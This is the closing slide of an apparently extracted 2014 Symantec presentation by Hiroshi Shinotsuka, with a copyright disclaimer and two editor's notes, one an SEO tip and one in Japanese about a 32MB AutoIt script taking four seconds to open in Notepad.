  • 32. Thank  you!   Copyright  ©  2014  Symantec  Corpora/on.  All  rights  reserved.  Symantec  and  the  Symantec  Logo  are  trademarks  or  registered  trademarks  of  Symantec  Corpora;on  or  its  affiliates   in  the  U.S.  and  other  countries.    Other  names  may  be  trademarks  of  their  respec;ve  owners.   This  document  is  provided  for  informa;onal  purposes  only  and  is  not  intended  as  adver;sing.    All  warran;es  rela;ng  to  the  informa;on  in  this  document,  either  express  or   implied,  are  disclaimed  to  the  maximum  extent  allowed  by  law.    The  informa;on  in  this  document  is  subject  to  change  without  no;ce.   Hiroshi  Shinotsuka  

Editor's Notes

  1. Tip: simple SEO adjustments can make your presentation more discoverable. Read this PDF for best practices:  http://seo.ges.symantec.com/seo-best-practices-for-file-optimization.pdf
  2. AutoItのスクリプトファイル 32MB を Windows に備わっているメモ帳で読み込むには4秒かかった 例えば、ファイルをダブルクリックして実行しようとしたときに、実行までに4秒かかるとしたら、、、待てません!